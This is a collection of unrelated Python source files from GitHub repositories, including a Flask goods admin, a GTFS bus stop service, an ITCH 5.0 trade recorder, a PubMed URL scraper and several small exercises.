ADMIN in roles \\\n            else False\n        auth_list = list()\n        if not is_admin:\n            # get authority by role list\n            # user is admin, not get role, all authority menu\n            role_models = self.role_bo.get_models_by_engnames(roles)\n            for _r in role_models:\n                if not _r or not _r.authority: continue\n                auth_list.extend([int(x) for x in _r.authority.split(';') if x])\n            auth_list = list(set(auth_list))    # deduplicate\n        # >>>>>>>>> add a role-permission check: drop menu IDs that are not in the role permissions\n        new_select = list()\n        for _mid in new_params.get('select_list'):\n            if is_admin or int(_mid) in auth_list:  # admins keep every selected menu id; auth_list is empty for them\n                new_select.append(_mid)\n        new_params['select'] = ';'.join(new_select)\n        # -------------------- 3 - shortcut model --------------------\n        \"\"\"\n        2 cases:\n        - create\n        - update\n        \"\"\"\n        shortcut = self.shortcut_bo.get_model_by_rtx(rtx_id)\n        if not shortcut:    # create\n            new_shortcut_model = self.shortcut_bo.new_mode()\n            new_shortcut_model.rtx_id = rtx_id\n            new_shortcut_model.shortcut = new_params['select']\n            new_shortcut_model.create_time = get_now()\n            new_shortcut_model.is_del = False\n            self.shortcut_bo.add_model(new_shortcut_model)\n        else:   # update\n            setattr(shortcut, 'shortcut', new_params['select'])\n            setattr(shortcut, 'update_rtx', rtx_id)\n            setattr(shortcut, 'update_time', get_now())\n            self.shortcut_bo.merge_model(shortcut)\n        # return data\n        return Status(\n            100, 'success', StatusMsgs.get(100), {}\n            
).json()\n","repo_name":"GIS90/open2lisapi","sub_path":"deploy/services/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":32991,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"}
{"seq_id":"14209673412","text":"#What is the value of the first triangle number to have over\n# five hundred divisors?\n\n#important note is that the nth triangle number can be represented by n*(n+1)/2\n\nimport math;\nfrom time import time;\n\ndef divisors(n):\n    num_factors = 0;\n    for i in range(1,int(math.floor(n**.5))+1):  # only go up to floor(sqrt(n)); ceil double-counts divisors near sqrt(n)\n        if n%i == 0:\n            num_factors += 2;\n    # if it is a perfect square then subtract one factor\n    if i*i == n:\n        num_factors -= 1;\n    return num_factors;\n\ncnt = 0;\nn = 1;\nt = time();\n\nwhile cnt < 500:\n    Tn = (n*(n+1))//2;\n    if n%2 == 0:\n        cnt = divisors(n//2)*divisors(n+1);  # integer division keeps the arguments integral in Python 3\n    else:\n        cnt = divisors(n)*divisors((n+1)//2);\n    n += 1;\n\ntt = time() - t;\nprint(Tn);\nprint(tt);","repo_name":"jnchristensen/python","sub_path":"12. Take 2.py","file_name":"12. Take 2.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
{"seq_id":"17511885133","text":"from gtfs.parser.gtfs_reader import GTFS\nfrom gtfs.parser.route_stories import load_route_stories_from_csv\nfrom gtfs.bus2train.utilities import load_train_station_distance, routes_calling_at_stop, route_frequency\nfrom collections import defaultdict\n\nimport falcon\nfrom wsgiref import simple_server\n\nfrom sklearn.neighbors import KDTree\nimport numpy as np\nimport os\nimport json\nfrom datetime import date\nimport sys\n\ngtfs_folder = 'data/gtfs/gtfs_2016_05_25/' if len(sys.argv) == 1 else sys.argv[1]\nstart_date = date(2016, 6, 1)\n\n\nclass IndexServer:\n    def __init__(self):\n        self.content = open(os.path.join(os.path.dirname(__file__), 'stops.html'), encoding='utf8').read()\n\n    def on_get(self, req, resp):\n        self.content = open(os.path.join(os.path.dirname(__file__), 'stops.html'), encoding='utf8').read()\n        resp.body = self.content\n        resp.set_header('Content-Type', 'text/html')\n\n\nclass StopFinder:\n    def __init__(self, gtfs_folder):\n        self.gtfs = GTFS(os.path.join(gtfs_folder, 'israel-public-transportation.zip'))\n        self.gtfs.load_stops()\n        self.gtfs.load_routes()\n\n        print(\"Loading tree\")\n        stop_locations = np.matrix([(s.stop_lat, s.stop_lon) for s in self.gtfs.stops.values()])\n        self.stops = [s for s in self.gtfs.stops.values()]\n        self.tree = KDTree(stop_locations)\n        print(\"Tree loaded\")\n\n        print(\"Loading station distance\")\n        self.station_distance = load_train_station_distance(gtfs_folder)\n        print(\"Station distance loaded\")\n\n        print(\"Loading route stories\")\n        route_stories, trip_to_stories = load_route_stories_from_csv(os.path.join(gtfs_folder, 'route_stories.txt'),\n                                                                     os.path.join(gtfs_folder,\n                                                                                  'trip_to_stories.txt'))\n        print(\"Route stories loaded\")\n\n        print(\"Loading routes calling at stops\")\n        route_freq = route_frequency(self.gtfs, start_date)\n        self.routes_calling_at_stop = defaultdict(lambda: [])\n        for stop_id, routes in routes_calling_at_stop(self.gtfs, trip_to_stories, start_date).items():\n            self.routes_calling_at_stop[stop_id] = [(route, *route_freq[route]) for route in routes]\n        print(\"Calling at stops loaded\")\n        print(\"Ready.\")\n\n    def find(self, lat, lng):\n        d, p = self.tree.query(np.matrix((lat, lng)), k=1, return_distance=True)  # d[0] is the distance\n        return self.stops[int(p[0])]  # p has shape (1, 1); convert the single index to a plain int\n\n    def on_get(self, req, resp):\n        \"\"\"Handles GET requests\"\"\"\n        lat = 
float(req.get_param('lat'))\n lng = float(req.get_param('lng'))\n print(\"Request received for (%s,%s)\" % (lat, lng))\n # find nearest bus stop to click location\n stop = self.find(lat, lng)\n # nearest train station to the bus stop\n nearest_train_station = self.station_distance[stop.stop_id]\n train_station_name = self.gtfs.stops[nearest_train_station.station_id].stop_name\n train_station_distance = nearest_train_station.distance\n # routes stopping at the bus stop\n routes = [{\n 'line_number': route_and_frequency[0].line_number,\n 'route_code': route_and_frequency[0].route_desc,\n 'weekday_calls': route_and_frequency[1],\n 'weekend_calls': route_and_frequency[2]\n } for route_and_frequency in self.routes_calling_at_stop[stop.stop_id]]\n\n resp.body = json.dumps({\n 'stop_id': stop.stop_id,\n 'stop_code': stop.stop_code,\n 'stop_name': stop.stop_name,\n 'stop_desc': stop.stop_desc,\n 'zone_id': stop.zone_id,\n 'lat': stop.stop_lat,\n 'lng': stop.stop_lon,\n 'is_train_station': train_station_distance == 0,\n 'train_station': train_station_name,\n 'train_station_distance': int(train_station_distance),\n 'routes': routes\n })\n\napp = falcon.API()\napp.add_route('/', IndexServer())\napp.add_route('/stop', StopFinder(gtfs_folder))\n\n# Useful for debugging problems in your API; works with pdb.set_trace(). You\n# can also use Gunicorn to host your app. Gunicorn can be configured to\n# auto-restart workers when it detects a code change, and it also works\n# with pdb.\nif __name__ == '__main__':\n httpd = simple_server.make_server('127.0.0.1', 8000, app)\n httpd.serve_forever()\n","repo_name":"bogind/open_bus","sub_path":"gtfs/web/stops_service.py","file_name":"stops_service.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"3828172545","text":"import cv2\nimport numpy as np\n\n# Load the face and emotion classifiers\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\nemotion_classifier = cv2.CascadeClassifier('haarcascade_smile.xml')\n\n# Set up the webcam feed\ncap = cv2.VideoCapture(0)\n\nwhile True:\n # Capture frame-by-frame\n ret, frame = cap.read()\n\n # Convert the frame to grayscale for face detection\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # Detect the faces in the frame\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n\n # Draw rectangles around the detected faces\n for (x, y, w, h) in faces:\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\n\n # Crop the face and convert it to grayscale for emotion detection\n roi_gray = gray[y:y + h, x:x + w]\n\n # Detect the smile in the face\n smiles = emotion_classifier.detectMultiScale(roi_gray, scaleFactor=1.5, minNeighbors=15, minSize=(25, 25))\n\n # Draw rectangles around the detected smiles\n for (sx, sy, sw, sh) in smiles:\n cv2.rectangle(frame, (x + sx, y + sy), (x + sx + sw, y + sy + sh), (0, 0, 255), 2)\n\n # Display the resulting frame\n cv2.imshow('frame', frame)\n\n # Exit the program when the user presses 'q'\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()","repo_name":"malgorath/OscarAI","sub_path":"smile_detector.py","file_name":"smile_detector.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73806124638","text":"import math\nimport textdistance\nimport pandas as pd\n\n\ndef 
sort_2d_array_mark(array):\n    \"\"\"\n    # sort the imported excel file as 2d array according to marks of tasks\n    :param array: a 2d array\n    :return: None; the array is sorted in place, from left to right and from top to bottom\n    \"\"\"\n    # header = array.pop(0)\n    # sort rows\n    for i in range(2, len(array)):\n        for j in range(i, len(array)):\n            count1 = 0\n            count2 = 0\n            for k in range(1, len(array[0])):\n                count1 += int(array[i][k])\n                count2 += int(array[j][k])\n            if count1 < count2:\n                array[j], array[i] = array[i], array[j]\n    # sort columns\n    for i in range(1, len(array[0]) - 1):\n        for j in range(1, len(array[0]) - i):\n            count1 = 0\n            count2 = 0\n            for k in range(2, len(array) - 1):\n                count1 += int(array[k][j])\n                count2 += int(array[k][j + 1])\n            if count1 < count2:\n                for k in range(len(array)):\n                    array[k][j], array[k][j + 1] = array[k][j + 1], array[k][j]\n\n\ndef break_down_marks(array, index):\n    indexs = []\n\n    for i in range(1, len(array[0])):\n        count = 0\n        for string in index[0]:\n            if textdistance.hamming.normalized_similarity(string, str(array[0][i])) >= 0.5:\n                count += 1\n        indexs.append(count)\n\n    transposed_array = transpose(array)\n\n    max_mark = []\n    for i in range(1, len(transposed_array)):\n        # the highest mark actually awarded for this task\n        max_mark.append(int(max(transposed_array[i][2:])))\n\n    for i in range(len(indexs)):\n        if indexs[i] < max_mark[i]:\n            raise Exception(\"the max mark of this task is greater than its total sub-criteria\")\n\n    new_array = [index[1], index[0]]\n\n    for row in range(1, len(array)):\n        tmp = []\n        for column in range(1, len(array[0])):\n            for i in range(indexs[column - 1]):\n                if array[row][column] > 0:\n                    tmp.append(1)\n                    array[row][column] -= 1\n                else:\n                    tmp.append(0)\n                    array[row][column] -= 1\n        # print(tmp)\n        new_array.append(tmp)\n    # new_array[1][0] = \"student_id\"\n    new_array[0].insert(0, \"\")\n    for i in range(len(array)):\n        new_array[i + 1].insert(0, array[i][0])\n    return new_array\n\n\ndef transpose(array):\n    \"\"\"\n    # transpose the array\n    :param array: 2d array\n    :return: transposed 2d array\n    \"\"\"\n    temp = [[0 for x in range(len(array))] for y in (range(len(array[0])))]\n    for i in range(len(array)):\n        for j in range(len(array[i])):\n            temp[j][i] = array[i][j]\n    return temp\n\n\ndef readfile(file_name):\n    \"\"\"\n    # read an excel file and store it in a 2d array\n    :return: a 2d array containing all information from that excel file\n    \"\"\"\n    xls = pd.ExcelFile(file_name)\n    sheet_names = xls.sheet_names\n\n    if len(sheet_names) < 2:\n        raise Exception('Excel file has less than 2 work sheets')\n\n    df1 = pd.read_excel(xls, sheet_names[0])\n\n    excel_dict1 = df1.to_dict(orient='dict')\n\n    array1 = []\n    # read the first worksheet\n    for key in excel_dict1.keys():\n        temp_array1 = []\n        for index in excel_dict1[key]:\n            temp_array1.append(excel_dict1[key][index])\n\n        array1.append(temp_array1)\n    for i in range(len(array1[0])):\n        array1[0][i] = str(array1[0][i])\n\n    fst_row_int_cnt, snd_row_int_cnt = 0, 0\n    item_name = []\n    for i in range(1, len(array1)):\n        if isinstance(array1[i][0], (float, int)) and int(math.floor(array1[i][0])) == array1[i][0]:\n            snd_row_int_cnt += 1\n        item_name.append(array1[i][0])\n        for j in range(1, len(array1[0])):\n            if not isinstance(array1[i][j], (float, int)) or \\\n                    math.isnan(array1[i][j]) or array1[i][j] < 0 or \\\n                    int(math.floor(array1[i][j])) != array1[i][j]:\n                raise Exception(\"Mark data should be present starting from B3, non-integer or negative value detected.\")\n    if snd_row_int_cnt == len(array1) - 1:\n        raise Exception(\"Second row should be 
item names, digit value detected.\")\n    if len(item_name) != len(set(item_name)):\n        raise Exception(\"Duplicate item name detected.\")\n    if len(array1[0][1:]) != len(set(array1[0][1:])):\n        raise Exception(\"Duplicate student name detected.\")\n\n    array2 = []\n\n    df2 = pd.read_excel(xls, sheet_names[1])\n    excel_dict2 = df2.to_dict(orient='dict')\n\n    for key in excel_dict2.keys():\n        temp_array2 = []\n        for index in excel_dict2[key]:\n            temp_array2.append(excel_dict2[key][index])\n        array2.append(temp_array2)\n\n    # check whether the criteria are listed in order\n    previous = \"\"\n    for i in range(len(array2[0])):\n        if previous > array2[0][i]:\n            raise Exception(\"the criteria in worksheet 2 are not listed in order\")\n        previous = array2[0][i]\n    return array1, array2\n","repo_name":"chengengliu/Guttman-Analysis-System-MasterProject","sub_path":"model/file_importing/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5039,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"}
{"seq_id":"22203826093","text":"\"\"\"\nWrite a function fibonacci that:\nInput: (n: int) n is greater than 0 (guaranteed)\nOutput: return the number at index n in fibonacci sequence\n\"\"\"\n\n\ndef fibonacci(n: int):\n    if n < 0:\n        return None\n    elif n == 0 or n == 1:\n        return n\n    else:\n        return fibonacci(n - 1) + fibonacci(n - 2)\n","repo_name":"ntxtung/python-course","sub_path":"001_introduction_to_programming/015_fibonacci/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
{"seq_id":"21904959096","text":"\"\"\"itch50_exec_trade_recorder.py: A trade recorder for ITCH 5.0\"\"\"\n\n__author__ = \"Charles Martineau\"\n__email__ = \"martineau.charles@gmail.com\"\n\nfrom meatpy.market_event_handler import MarketEventHandler\nfrom meatpy.itch50.itch50_market_message import *\nfrom meatpy.itch50.itch50_market_message import TradeMessage\n\n\n\nclass ITCH50ExecTradeRecorder(MarketEventHandler):\n    def __init__(self):\n        self.records = []\n\n    def message_event(self, market_processor, timestamp, message):\n        \"\"\"Detect messages that affect the top of the book and record them\"\"\"\n        lob = market_processor.current_lob\n        if isinstance(message, OrderExecutedMessage):\n            # An executed order will ALWAYS be against top of book\n            # because of price priority, so record.\n            if lob.ask_order_on_book(message.orderRefNum):\n                record = {\"MessageType\": \"Exec\", \"Volume\": message.shares, \"OrderID\": message.orderRefNum}\n                record[\"Queue\"] = \"Ask\"\n                record[\"Price\"] = lob.ask_levels[0].price\n                (queue, i, j) = lob.find_order(message.orderRefNum)\n                record[\"OrderTimestamp\"] = queue[i].queue[j].timestamp\n\n                self.records.append((timestamp, record))\n            elif lob.bid_order_on_book(message.orderRefNum):\n                record = {\"MessageType\": \"Exec\", \"Volume\": message.shares, \"OrderID\": message.orderRefNum}\n                record[\"Queue\"] = \"Bid\"\n                record[\"Price\"] = lob.bid_levels[0].price\n                (queue, i, j) = lob.find_order(message.orderRefNum)\n                record[\"OrderTimestamp\"] = queue[i].queue[j].timestamp\n                self.records.append((timestamp, record))\n        elif isinstance(message, TradeMessage):\n            if message.bsindicator == b'S':\n                record = {\"MessageType\": \"ExecHid\", \"Volume\": message.shares, \"OrderID\": '', \"OrderTimestamp\": ''}\n                record[\"Queue\"] = \"Ask\"\n                record[\"Price\"] = message.price\n                self.records.append((timestamp, record))\n            elif message.bsindicator == b'B':\n                record = 
{\"MessageType\": \"ExecHid\", \"Volume\": message.shares, \"OrderID\": '', \"OrderTimestamp\": ''}\n record[\"Queue\"] = \"Bid\"\n record[\"Price\"] = message.price\n self.records.append((timestamp, record))\n elif isinstance(message, OrderExecutedPriceMessage):\n if (len(lob.ask_levels) > 0 and\n lob.ask_levels[0].order_on_book(message.orderRefNum)):\n record = {\"MessageType\": \"ExecPrice\", \"Queue\": \"Ask\", \"Volume\": message.shares, \"OrderID\": message.orderRefNum, \"Price\": message.price}\n (queue, i, j) = lob.find_order(message.orderRefNum)\n record[\"OrderTimestamp\"] = queue[i].queue[j].timestamp\n self.records.append((timestamp, record))\n elif (len(lob.bid_levels) > 0 and\n lob.bid_levels[0].order_on_book(message.orderRefNum)):\n record = {\"MessageType\": \"ExecPrice\", \"Queue\": \"Bid\", \"Volume\": message.shares, \"OrderID\": message.orderRefNum, \"Price\": message.price}\n (queue, i, j) = lob.find_order(message.orderRefNum)\n record[\"OrderTimestamp\"] = queue[i].queue[j].timestamp\n self.records.append((timestamp, record))\n\n def write_csv(self, file):\n \"\"\"Write to a file in CSV format\"\"\"\n # Write header row\n file.write('Timestamp,MessageType,Queue,Price,Volume,OrderID,OrderTimestamp\\n'.encode())\n # Write content\n for x in self.records:\n row = (str(x[0]) + ',' + x[1][\"MessageType\"] + ',' +\n x[1][\"Queue\"] + ',' + str(x[1][\"Price\"]) + ',' +\n str(x[1][\"Volume\"]) + ',' + str(x[1][\"OrderID\"]) +\n ',' + str(x[1][\"OrderTimestamp\"]) + '\\n')\n file.write(row.encode())","repo_name":"vgreg/MeatPy","sub_path":"meatpy/itch50/itch50_exec_trade_recorder.py","file_name":"itch50_exec_trade_recorder.py","file_ext":"py","file_size_in_byte":3910,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"51"} +{"seq_id":"35657637898","text":"\"\"\"\nURL scraping de las publicaciones de PubMed. 
Given a file with the different PMIDs, one per line,\nretrieves the source URLs and stores them next to each PMID.\n\"\"\"\n\nfrom utils import fetch_url, redirect, elsevier\nimport sys\n\ndef get_src_url(pmid):\n    \"\"\"Given a PMID, returns the source URL.\"\"\"\n    BASE_PUBMED_URL = \"https://www.ncbi.nlm.nih.gov/pubmed/\"\n    data = fetch_url(BASE_PUBMED_URL + pmid)\n    return extract_src_url(data)\n\ndef extract_src_url(data):\n    \"\"\"Extracts the source URL from the contents of a PubMed page.\"\"\"\n    for l in data.split(\"\\n\"):\n        try:\n            found = l.index(\"Full Text Sources\")\n            href = l.index(\"href=\", found)\n            url = l[href+6:l.index('\"', href+7)].replace(\"&amp;\", \"&\")\n            return get_true_url(url)\n        except:\n            pass\n    return \"No encontrado\"\n\ndef get_true_url(url):\n    \"\"\"For certain sources that are actually a redirect.\"\"\"\n    if \"doi.org\" in url:\n        print(\"Redirecting\", url)\n        return redirect(url) or url\n    elif \"linkinghub.elsevier.com\" in url:\n        print(\"Redirecting\", url)\n        return elsevier(url) or url\n    else:\n        return url\n\ndef test():\n    \"\"\"Function to check that extraction works.\"\"\"\n    data = open(\"example.html\").read()\n    assert \"https://linkinghub.elsevier.com/retrieve/pii/S0002-9149(99)00490-7\" == extract_src_url(data)\n\n\n\ndef process_line(l):\n    if len(l.split()) > 1:\n        pmid, url = l.split()[0], l.split()[1]\n        if url != \"No\":\n            return pmid + \" \" + get_true_url(url)\n        else:\n            return l\n    else:\n        url = get_src_url(l)  # l == pmid\n        print(l.strip(), url)\n        return l.strip() + \" \" + url\n\n\nif __name__ == \"__main__2\":\n    if len(sys.argv) == 2 and sys.argv[1] == \"-t\":\n        test()\n        exit()\n    if len(sys.argv) != 3:\n        print(\"Usage: {} input_file output_file\".format(sys.argv[0]))\n        exit()\n    with open(sys.argv[2], \"w\") as out:\n        with open(sys.argv[1]) as f:\n            for l in f:\n                if len(l.split()) > 1:\n                    pmid, url = l.split()[0], l.split()[1]\n                    if url != \"No\":\n                        out.write(pmid + \" \" + get_true_url(url) + \"\\n\")\n                    else:\n                        out.write(l)\n                else:\n                    url = get_src_url(l)  # l == pmid\n                    print(l.strip(), url)\n                    out.write(l.strip() + \" \" + url + \"\\n\")\n\n\nimport parallel\nif __name__ == \"__main__\":\n    if len(sys.argv) != 3:\n        print(\"Usage: {} input_file output_file\".format(sys.argv[0]))\n        exit()\n    with open(sys.argv[1]) as f:\n        parallel.parallel_map_to_file(process_line, f.readlines(), sys.argv[2])\n","repo_name":"johny65/PFC_DGIdb_src","sub_path":"scraping/base_pubmed.py","file_name":"base_pubmed.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
{"seq_id":"16232989229","text":"#!/usr/bin/env python3\n# from dataclasses import dataclass\n#\n# from dataclasses_jsonschema import JsonSchemaMixin\n#\n#\n# @dataclass\n# class X(JsonSchemaMixin):\n#     \"A 2D point\"\n#     x: str\n#     y: str\n#\n# print(X('ewe', 'wewe'))\n\ndata = {\n    \"first_name\": \"Jonathan\",\n    \"middle_name\": None,\n    \"last_name\": \"Hsu\",\n    \"family\": {\n        \"mother\": \"Mary\",\n        \"father\": \"Peter\",\n        \"brother\": \"Charles\",\n        \"sister\": None,\n        \"eeee\": [],\n    },\n    \"tmp\": {\n        \"a\": None,\n        \"b\": None,\n    },\n    \"lol\": {\n        \"jhund\": {\n            \"sss\": None,\n            \"uuu\": \"skdksnd\",\n        },\n        \"lll\": None,\n        \"gggg\": [1,2,3,4,5]\n    }\n}\n\nfrom typing import Dict\n\ndef clean_null_terms(input_dict: Dict):\n    \"\"\"\n    Recursively remove None-valued entries from a (possibly nested) dict.\n\n    :param input_dict: dictionary to clean\n    :return: a new dict without None-valued entries\n    \"\"\"\n    clean = {}\n    for k, v in input_dict.items():\n        if isinstance(v, Dict):\n            # import pdb\n            # pdb.set_trace()\n            nested = clean_null_terms(v)\n            if 
\n\nimport json\nprint(json.dumps(clean_null_terms(data), indent=4))\n","repo_name":"arknandan25/Python101","sub_path":"dataclass.py","file_name":"dataclass.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"}
+{"seq_id":"1528873572","text":"import pandas as pd\nimport numpy as np\nimport plotly.graph_objs as go\nfrom plotly.offline import iplot, init_notebook_mode\n\n\ndef read_data(file):\n    return pd.read_csv(file)\n\n\nfile = \"2010YumaAZ.csv\"\ndf = read_data(file)\n\n\ndef describe_data(df):\n    print(\"Sample \\n\", df.sample(50))\n    print(\"\\n Describe data \\n\", df.describe())\n    print(\"\\n Columns \\n\", df.columns)\n    print(\"Information\", df.info())\n\n\ndata = [go.Scatter(x=df['LST_TIME'],\n                   y=df[df['DAY'] == day]['T_HR_AVG'],\n                   mode='lines+markers',\n                   name=day)\n        for day in df['DAY'].unique()]\n\nlayout = go.Layout(title='Daily Temperature line Chart',\n                   xaxis={'title': 'X axis'},\n                   yaxis={'title': 'y axis'})\n\nfig = go.Figure(data, layout)\n\niplot(fig)\n","repo_name":"Billy254/plotly-data-visualization-","sub_path":"line_chart_exercise.py","file_name":"line_chart_exercise.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
+{"seq_id":"26970998435","text":"# Atlantapizza.py\n\nnumber_of_pizzas = float(input(\"How many pizzas do you want? \"))\n\ncost_per_pizza = float(input(\"How much does each pizza cost? \"))\n\nsubtotal = number_of_pizzas * cost_per_pizza\n\ntax_rate = 0.08\n\nsales_tax = subtotal * tax_rate
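\n\n# Worked check with hypothetical input: 3 pizzas at $8.50 each gives\n# subtotal 25.50, sales tax 25.50 * 0.08 = 2.04, and a total of 27.54.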
\n\ntotal = subtotal + sales_tax\n\nprint(\"The total cost is $\", total)\nprint(\"This includes $\", subtotal, \"for the pizza and\")\nprint(\"$\", sales_tax, \"in sales tax.\")\n","repo_name":"pratith-girish/python-course","sub_path":"chapter 3/Pizza.py","file_name":"Pizza.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"}
+{"seq_id":"367191575","text":"from decimal import Decimal\n\nfrom flask import Blueprint, request, redirect, jsonify\nfrom sqlalchemy import or_\n\nfrom common.libs.Helper import ops_render, ipagenation, getcurrentdate\nfrom common.libs.UrlManager import UrlManager\nfrom common.models.goods.Goods import Goods\nfrom application import app, db\n\nrouter_goods = Blueprint('goods_page', __name__)\n\n@router_goods.route(\"/index/\")\ndef index():\n    resp_data = {}\n    query = Goods.query\n    req = request.values\n    page = int(req['p']) if ('p' in req and req['p']) else 1\n    if 'status' in req and int(req['status']) > -1:\n        query = query.filter(Goods.status == int(req['status']))\n    if 'mix_kw' in req:\n        rule = or_(Goods.name.ilike('%{0}%'.format(req['mix_kw'])), Goods.tags.ilike('%{0}%'.format(req['mix_kw'])))\n        query = query.filter(rule)\n    if 'cat_id' in req and int(req['cat_id']) > 0:\n        query = query.filter(Goods.cat_id == int(req['cat_id']))\n    params = {\n        'total': query.count(),\n        'page_size': 5,\n        'page': page,\n        'url': request.full_path.replace('&p={}'.format(page), '')\n    }\n    pages = ipagenation(params)\n    # index of the first row on the current page\n    offset = (page - 1) * 5\n    # index just past the last row on the current page\n    limit = page * 5
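\n    # e.g. page 3 with page_size 5 gives offset 10 and limit 15, i.e. rows [10:15]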
\n    list = query.all()[offset:limit]\n    resp_data['list'] = list\n    resp_data['status'] = app.config['STATUS']\n    resp_data['pages'] = pages\n    return ops_render('/goods/index.html', resp_data)\n\n\n@router_goods.route(\"/info/\")\ndef info():\n    resp_data = {}\n\n    return ops_render('goods/info.html')\n\n\n@router_goods.route(\"/set/\", methods=['GET', 'POST'])\ndef set():\n    if request.method == 'GET':\n        resp_data = {}\n        req = request.args\n        id = int(req.get('id', 0))\n        info = Goods.query.filter_by(id=id).first()\n        if info and info.status != 1:\n            return redirect(UrlManager.buildUrl('/goods/index/'))\n        resp_data['info'] = info\n        return ops_render('goods/set.html', resp_data)\n    resp = {\n        'code': 200,\n        'msg': 'Operation successful!',\n        'data': {}\n    }\n    req = request.values\n    id = int(req['id']) if 'id' in req and req['id'] else 0\n    cat_id = int(req['cat_id']) if 'cat_id' in req else 0\n    name = req['name'] if 'name' in req else ''\n    price = req['price'] if 'price' in req else ''\n    main_image = req['main_image'] if 'main_image' in req else ''\n    summary = req['summary'] if 'summary' in req else ''\n    stock = int(req['stock']) if 'stock' in req else 0\n    tags = req['tags'] if 'tags' in req else ''\n\n    if cat_id < 1:\n        resp['code'] = -1\n        resp['msg'] = 'Please select a category'\n        return jsonify(resp)\n    if name is None or len(name) < 1:\n        resp['code'] = -1\n        resp['msg'] = 'Please enter a valid name'\n        return jsonify(resp)\n    if not price or len(price) < 1:\n        resp['code'] = -1\n        resp['msg'] = 'Please enter a valid price'\n        return jsonify(resp)\n    price = Decimal(price).quantize(Decimal('0.00'))\n    if price < 0:\n        resp['code'] = -1\n        resp['msg'] = 'Please enter a valid price'\n        return jsonify(resp)\n    if main_image is None or len(main_image) < 1:\n        resp['code'] = -1\n        resp['msg'] = 'Please upload a cover image'\n        return jsonify(resp)\n    if summary is None or len(summary) < 1:\n        resp['code'] = -1\n        resp['msg'] = 'Please enter a product description of at least 10 characters'\n        return jsonify(resp)\n    if stock < 1:\n        resp['code'] = -1\n        resp['msg'] = 'Please enter a valid stock quantity'\n        return jsonify(resp)\n    if tags is None or len(tags) < 1:\n        resp['code'] = -1\n        resp['msg'] = 'Please enter tags to make searching easier'\n        return jsonify(resp)\n    goods_info = Goods.query.filter_by(id=id).first()\n    before_stock = 0\n    if goods_info:\n        model_goods = goods_info\n        before_stock = model_goods.stock\n    else:\n        model_goods = Goods()\n        model_goods.status = 1\n        # store a formatted creation time\n        model_goods.created_time = getcurrentdate()\n    model_goods.cat_id = cat_id\n    model_goods.name = name\n    model_goods.price = price\n    model_goods.main_image = main_image\n    model_goods.summary = summary\n    model_goods.stock = stock\n    model_goods.tags = tags\n    model_goods.updated_time = getcurrentdate()\n\n    db.session.add(model_goods)\n    db.session.commit()\n\n    return jsonify(resp)\n\n@router_goods.route(\"/cat/\")\ndef cat():\n    resp_data = {}\n\n    return ops_render('goods/cat.html')\n\n\n@router_goods.route(\"/cat_set/\")\ndef cat_set():\n    resp_data = {}\n\n    return ops_render('goods/cat_set.html')\n\n","repo_name":"wgf0210/hmsx","sub_path":"hmsx/web/controllers/goods/Goods.py","file_name":"Goods.py","file_ext":"py","file_size_in_byte":4551,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"}
+{"seq_id":"26303324218","text":"import heapq\nimport time\n\nfrom horizons.util.python.singleton import ManualConstructionSingleton\n\n\nclass _ExtCallbackObject:\n\t\"\"\"Class used by the ExtScheduler Class to organize callbacks.\"\"\"\n\n\tdef __init__(self, callback, class_instance, run_in=1, loops=1):\n\t\t\"\"\"Creates the CallbackObject instance.\n\t\t@param callback: lambda function callback, which is called run_in ticks.\n\t\t@param class_instance: class instance the original function (not the lambda function!) belongs to.\n\t\t@param run_in: int number of ticks after which the callback is called. Standard is 1, run next tick.\n\t\t@param loops: How often the callback is called. -1 = infinite times. Standard is 1, run once.\n\t\t\"\"\"\n\t\tself.callback = callback\n\t\tself.class_instance = class_instance\n\t\tself.run_in = run_in\n\t\tself.loops = loops\n\n\tdef __str__(self):\n\t\treturn \"ExtSchedCb(%s on %s)\" % (self.callback, self.class_instance)\n\n\tdef __lt__(self, other):\n\t\t# make sure that there is always some ordering\n\t\tif self.run_in < other.run_in:\n\t\t\treturn True\n\t\treturn id(self) < id(other)
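\n\t# Why __lt__ matters: the scheduler pushes [timestamp, obj] lists onto a heap,\n\t# and when two timestamps are equal heapq falls back to comparing the objects\n\t# themselves; without a total ordering that comparison would raise TypeError.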
